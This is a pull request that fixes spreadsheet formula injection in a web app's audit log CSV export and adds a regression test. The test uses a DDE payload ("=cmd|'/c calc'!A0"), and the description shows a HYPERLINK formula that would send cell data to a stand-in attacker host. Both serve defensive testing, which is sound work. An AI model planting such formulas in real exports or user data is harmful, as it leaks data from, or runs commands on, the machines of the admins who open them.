### PR TITLE
fix(web): neutralize CSV/formula injection in audit log export

### DIFF
--- a/web/src/pages/audit/AuditLogPage.tsx
+++ b/web/src/pages/audit/AuditLogPage.tsx
@@ -214,14 +214,34 @@ function fmtTime(ts: string): string {
 
 // ─── CSV export ───────────────────────────────────────────────────────────────
 
+// toCsvCell neutralizes spreadsheet formula injection (CWE-1236) and applies
+// standard CSV quoting, mirroring server/http/handlers/csv_safe.go's csvSafe --
+// this is the only client-side CSV builder in the app (every other export fetches
+// an already-escaped .csv blob from the server), so it can't rely on that helper
+// and needs its own equivalent. `actor` in particular has no character-set
+// restriction beyond length (a username can start with =, +, -, or @: see
+// internal/core/users.go's validateUsernameFormat), and audit descriptions can
+// embed one with no fixed literal prefix (internal/core/impersonation.go) -- so
+// both fields need the same protection `description` alone used to get.
+function toCsvCell(value: string): string {
+    let v = value;
+    if (v !== '' && /^[=+\-@\t\r]/.test(v)) {
+        v = "'" + v;
+    }
+    if (/["\n\r,]/.test(v)) {
+        v = `"${v.replaceAll('"', '""')}"`;
+    }
+    return v;
+}
+
 function exportCSV(entries: AuditLogEntry[], filename: string) {
     const header = ['Timestamp', 'Event', 'Actor', 'Actor Type', 'Description'];
     const rows = entries.map((e) => [
         new Date(e.timestamp).toISOString(),
-        e.event_type,
-        e.actor,
-        e.actor_type ?? 'user',
-        `"${(e.description ?? '').replaceAll('"', '""')}"`,
+        toCsvCell(e.event_type),
+        toCsvCell(e.actor),
+        toCsvCell(e.actor_type ?? 'user'),
+        toCsvCell(e.description ?? ''),
     ]);
     const csv = [header, ...rows].map((r) => r.join(',')).join('\n');
     const blob = new Blob([csv], { type: 'text/csv;charset=utf-8;' });

--- a/web/src/pages/audit/__tests__/AuditLogPage.test.tsx
+++ b/web/src/pages/audit/__tests__/AuditLogPage.test.tsx
@@ -145,6 +145,60 @@ describe('AuditLogPage — audit tab', () => {
         expect(clickSpy).toHaveBeenCalled();
         clickSpy.mockRestore();
     });
+
+    // CWE-1236 (CSV/formula injection): a username has no character-set restriction
+    // beyond length (internal/core/users.go's validateUsernameFormat), and
+    // internal/core/impersonation.go's audit description embeds a username with no
+    // fixed literal prefix -- so `actor` and `description` can both legitimately start
+    // with =, +, -, or @. The backend's own CSV export (audit_export_csv.go) already
+    // neutralizes this via csvSafe; this proves the frontend's independent CSV builder
+    // does too, since it doesn't call that endpoint.
+    it('neutralizes formula-injection and properly quotes CSV-special characters on export', async () => {
+        useAuditLog.mockReturnValue({
+            data: {
+                data: [
+                    {
+                        id: 1,
+                        event_type: 'impersonation.start',
+                        actor: "=cmd|'/c calc'!A0",
+                        actor_type: 'user',
+                        description: '@SUM(1+1), with a comma and a "quote"',
+                        timestamp: '2026-01-01T10:00:00Z',
+                    },
+                ],
+                total: 1,
+                page: 1,
+                pageSize: 100,
+                totalPages: 1,
+            },
+            isLoading: false,
+            error: null,
+        });
+
+        let capturedBlob: Blob | undefined;
+        (URL as any).createObjectURL = vi.fn((b: Blob) => {
+            capturedBlob = b;
+            return 'blob:mock';
+        });
+        (URL as any).revokeObjectURL = vi.fn();
+        const clickSpy = vi.spyOn(HTMLAnchorElement.prototype, 'click').mockImplementation(() => {});
+
+        render(<AuditLogPage />);
+        fireEvent.click(screen.getByTitle('Export as CSV'));
+
+        expect(capturedBlob).toBeDefined();
+        const csvText = await capturedBlob!.text();
+        const [, dataRow] = csvText.split('\n');
+
+        // The actor cell must not put a raw '=' as the first character of its cell --
+        // csvSafe-style neutralization prefixes it with a leading quote first.
+        expect(dataRow.startsWith("2026-01-01T10:00:00.000Z,impersonation.start,'=cmd")).toBe(true);
+        // The description cell contains a comma and a double-quote, so proper CSV
+        // quoting must wrap it in quotes with internal quotes doubled, AND it must
+        // still carry the formula-injection prefix since it starts with '@'.
+        expect(dataRow).toContain('"\'@SUM(1+1), with a comma and a ""quote"""');
+        clickSpy.mockRestore();
+    });
 });
 
 describe('AuditLogPage — url filter banner', () => {


### PR DESCRIPTION
## Summary
Found during an adversarial security review of the web frontend. `AuditLogPage.tsx`'s `exportCSV` is the only client-side CSV builder in the app — every other export fetches an already-escaped `.csv` blob from the server. It got escaping wrong: only `description` was quote-escaped (and not comma/newline-safe even then), and none of the four exported fields (`event_type`, `actor`, `actor_type`, `description`) were protected against CWE-1236 spreadsheet formula injection.

**This is exploitable, not theoretical:**
- Usernames have no character-set restriction beyond length — `internal/core/users.go`'s `validateUsernameFormat` only checks `len(username)` is 3–50.
- `internal/core/impersonation.go`'s audit description embeds a username with **no fixed literal prefix**: `fmt.Sprintf("%s started impersonating %s", admin.Username, target.Username)`.
- A low-privileged user named e.g. `=HYPERLINK("http://evil.example/?"&A1,"x")` who triggers an audit event (or who simply registers with that username) plants a formula that fires the moment an admin opens the exported CSV in Excel/Sheets/LibreOffice.

The backend already solved this correctly one file away: `server/http/handlers/csv_safe.go`'s `csvSafe()`, used by the sibling `GET /api/v1/audit/export.csv` endpoint. The frontend's independent client-side builder just never got the same treatment.

## Fix
Added `toCsvCell` in `AuditLogPage.tsx`, mirroring `csvSafe`'s leading-character neutralization (`=`, `+`, `-`, `@`, tab, CR → prefixed with a leading `'`) plus standard CSV quoting (comma/quote/newline → quote-wrapped, internal quotes doubled), applied to all four exported string fields instead of just `description`.

## Test plan
- [x] Red-first: added a test with a malicious `actor`/`description` pair, capturing the actual exported `Blob`'s CSV content (not just asserting `createObjectURL` was called, which the existing test already did and which would pass either way) — confirmed **failing** against the unfixed code.
- [x] Green after the fix.
- [x] Mutation-tested: reverted just the formula-injection-prefix branch of `toCsvCell`, confirmed the test goes red again, restored.
- [x] `pnpm test --run` — full suite, 177 files / 3152 tests, all pass.
- [x] `pnpm type-check`, `pnpm lint`, `pnpm format:check`, `pnpm build` — all clean.